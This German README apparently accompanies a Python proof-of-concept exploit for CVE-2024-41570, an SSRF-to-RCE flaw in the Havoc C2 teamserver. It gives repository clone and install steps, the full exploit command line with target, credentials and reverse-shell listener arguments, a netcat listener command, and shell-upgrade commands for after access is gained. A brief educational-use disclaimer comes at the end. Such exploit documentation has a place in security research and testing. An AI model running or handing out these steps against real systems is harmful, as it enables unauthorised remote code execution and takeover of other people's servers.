
Automatisierter Reverse-Shell-Exploit über WebSocket | Havoc-C2-SSRF mit RCE
Dieses Skript bietet einen Python-basierten Proof-of-Concept (PoC) zur Ausnutzung eines anfälligen WebSocket-basierten Dienstes. Das Skript automatisiert die Agentenregistrierung, die WebSocket-Payload-Übermittlung und die Remote-Befehlsausführung, um eine Reverse Shell herzustellen.
pip install -r requirements.txt
git clone https://github.com/kit4py/CVE-2024-41570.git
cd CVE-2024-41570
pip install -r requirements.txt
Führen Sie das Skript mit den erforderlichen Argumenten aus:
python3 exploit.py -t <target_url> -i <teamserver_ip> -p <teamserver_port> -U <username> -P <password> -l <listener_ip> -L <listener_port>
-t: Ziel-URL des WebSocket-Servers.-i: IP-Adresse des Team-Servers von Havoc.-p: Port des Team-Servers von Havoc.-U: Benutzername für die WebSocket-Authentifizierung.-P: Passwort für die WebSocket-Authentifizierung.-l: Listener-IP für die Reverse Shell (Ihr Rechner).-L: Listener-Port für die Reverse Shell (Ihr Rechner).python3 exploit.py -t http://example.com -i 127.0.0.1 -p 40056 -U 'havocuser' -P 'password123' -l 192.168.1.2 -L 4444
nc -lvnp <listener_port>
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm-256color
stty rows 67 columns 318
Das Skript benötigt die folgenden Python-Bibliotheken:
requestspycryptodomeInstallieren Sie sie mit dem Befehl:
pip install -r requirements.txt
Dieses Skript ist ausschließlich für Bildungszwecke bestimmt. Stellen Sie sicher, dass Sie die ausdrückliche Berechtigung zum Testen des Zielsystems haben. Die missbräuchliche Verwendung dieses Skripts kann gegen Gesetze und ethische Richtlinien verstoßen.
Inspiriert von Default Havoc Poc
Beiträge sind willkommen! Forken Sie das Repository und reichen Sie einen Pull-Request ein.
Dieses Projekt ist unter der MIT-Lizenz lizenziert. Weitere Details finden Sie in der Datei LICENSE.